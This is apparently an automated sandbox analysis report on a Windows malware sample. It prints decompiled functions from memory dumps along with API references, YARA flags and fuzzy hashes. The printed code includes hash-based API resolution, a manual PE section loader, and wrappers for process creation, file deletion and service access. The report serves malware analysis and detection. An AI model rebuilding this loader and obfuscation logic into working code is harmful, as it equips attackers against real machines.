                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E10001780(intOrPtr* _a4, long _a8) {
                                              				long _t31;
                                              				signed int _t32;
                                              				intOrPtr* _t37;
                                              				void* _t47;
                                              				void** _t48;
                                              				signed int _t52;
                                              				signed int _t55;
                                              				long _t56;
                                              
                                              				_t48 = _a8;
                                              				_t56 = _t48[2];
                                              				if(_t56 != 0) {
                                              					_t52 = _t48[3];
                                              					if((_t52 & 0x02000000) == 0) {
                                              						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
                                              						if((_t52 & 0x04000000) != 0) {
                                              							_t31 = _t31 | 0x00000200;
                                              						}
                                              						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
                                              						asm("sbb eax, eax");
                                              						return  ~( ~_t32);
                                              					} else {
                                              						_t47 =  *_t48;
                                              						if(_t47 == _t48[1]) {
                                              							if(_t48[4] != 0) {
                                              								L7:
                                              								VirtualFree(_t47, _t56, 0x4000); // executed
                                              							} else {
                                              								_t37 = _a4;
                                              								_t55 =  *(_t37 + 0x30);
                                              								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
                                              									goto L7;
                                              								}
                                              							}
                                              						}
                                              						return 1;
                                              					}
                                              				} else {
                                              					return _t56 + 1;
                                              				}
                                              			}












                                              APIs
                                              • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E00234F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr* _t30;
                                              				signed int _t31;
                                              				void* _t38;
                                              				void* _t49;
                                              				void* _t51;
                                              				intOrPtr _t53;
                                              				signed int _t54;
                                              				intOrPtr _t55;
                                              				long _t56;
                                              				signed int _t58;
                                              				signed int _t59;
                                              				intOrPtr* _t65;
                                              				long _t66;
                                              				intOrPtr _t68;
                                              				void* _t70;
                                              				void* _t72;
                                              				void* _t75;
                                              				long* _t77;
                                              				void* _t78;
                                              
                                              				_t30 = _a16;
                                              				_t55 =  *_t30;
                                              				_t68 =  *((intOrPtr*)(_t30 + 4));
                                              				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
                                              				_v8 = _t68;
                                              				_v12 = 0;
                                              				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
                                              					L15:
                                              					return 1;
                                              				} else {
                                              					_t65 = VirtualAlloc;
                                              					_t7 = _t55 + 0x28; // 0x28
                                              					_t77 = _t7 + _t31;
                                              					do {
                                              						_t56 =  *_t77;
                                              						if(_t56 != 0) {
                                              							if(_a8 < _t77[1] + _t56) {
                                              								SetLastError(0xd);
                                              								goto L17;
                                              							} else {
                                              								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
                                              								if(_t38 == 0) {
                                              									goto L17;
                                              								} else {
                                              									_t66 =  *_t77;
                                              									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
                                              									_t70 = _t77[1] + _a4;
                                              									if(_t66 != 0) {
                                              										_t49 = _t51;
                                              										_t75 = _t70 - _t51;
                                              										do {
                                              											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
                                              											_t49 = _t49 + 1;
                                              											_t66 = _t66 - 1;
                                              										} while (_t66 != 0);
                                              									}
                                              									 *(_t77 - 8) = _t51;
                                              									goto L13;
                                              								}
                                              							}
                                              						} else {
                                              							_t54 =  *(_a12 + 0x38);
                                              							if(_t54 <= 0) {
                                              								goto L14;
                                              							} else {
                                              								_push(4);
                                              								_push(0x1000);
                                              								_push(_t54);
                                              								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
                                              								if( *_t65() == 0) {
                                              									L17:
                                              									return 0;
                                              								} else {
                                              									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
                                              									 *(_t77 - 8) = _t72;
                                              									if(_t54 != 0) {
                                              										_t58 = _t54;
                                              										_t59 = _t58 >> 2;
                                              										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
                                              										_t78 = _t78 + 0x18;
                                              									}
                                              									L13:
                                              									_t68 = _v8;
                                              									_t65 = VirtualAlloc;
                                              									goto L14;
                                              								}
                                              							}
                                              						}
                                              						goto L18;
                                              						L14:
                                              						_t53 = _v12 + 1;
                                              						_t77 =  &(_t77[0xa]);
                                              						_v12 = _t53;
                                              					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
                                              					goto L15;
                                              				}
                                              				L18:
                                              			}

























                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                              • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AllocErrorLastVirtual
                                              • String ID:
                                              • API String ID: 497505419-0
                                              • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                              • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                              • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                              • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E0022602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E0022602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 25%
                                              			E1000745A() {
                                              				void* _t1;
                                              				void* _t2;
                                              				void* _t3;
                                              				void* _t4;
                                              				void* _t7;
                                              
                                              				_push(1);
                                              				_push(0);
                                              				_push(0); // executed
                                              				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
                                              				return _t1;
                                              			}









                                              APIs
                                              • _doexit.LIBCMT ref: 10007460
                                                • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                                • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                                • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                                • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                                • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                                • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                              • String ID:
                                              • API String ID: 3712619029-0
                                              • Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                              • Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
                                              • Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                              • Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 92%
                                              			E00229FDC(void* __edx) {
                                              				void* __edi;
                                              				signed int _t751;
                                              				void* _t787;
                                              				signed char** _t788;
                                              				signed char** _t790;
                                              				signed char** _t793;
                                              				signed char** _t799;
                                              				short _t803;
                                              				signed int _t804;
                                              				signed int _t805;
                                              				void* _t806;
                                              				signed int _t809;
                                              				signed int _t817;
                                              				signed int _t820;
                                              				signed int _t832;
                                              				signed int _t836;
                                              				signed int _t903;
                                              				intOrPtr* _t917;
                                              				short* _t918;
                                              				short* _t919;
                                              				signed int _t920;
                                              				signed int _t921;
                                              				signed int _t922;
                                              				signed int _t923;
                                              				signed int _t924;
                                              				signed int _t925;
                                              				signed int _t926;
                                              				signed int _t927;
                                              				signed int _t928;
                                              				signed int _t929;
                                              				signed int _t930;
                                              				signed int _t931;
                                              				signed int _t932;
                                              				signed int _t933;
                                              				signed int _t934;
                                              				signed int _t935;
                                              				signed int _t936;
                                              				signed int _t937;
                                              				signed int _t945;
                                              				signed int _t946;
                                              				signed int _t948;
                                              				void* _t949;
                                              				void* _t950;
                                              				void* _t951;
                                              				void* _t954;
                                              				void* _t955;
                                              
                                              				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                              				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
                                              				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                              				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                              				_push(_t917);
                                              				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                              				_push(__edx);
                                              				_push(1);
                                              				E0022602B(1);
                                              				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
                                              				_t950 = _t949 + 0x1c;
                                              				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
                                              				_t946 = 0;
                                              				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
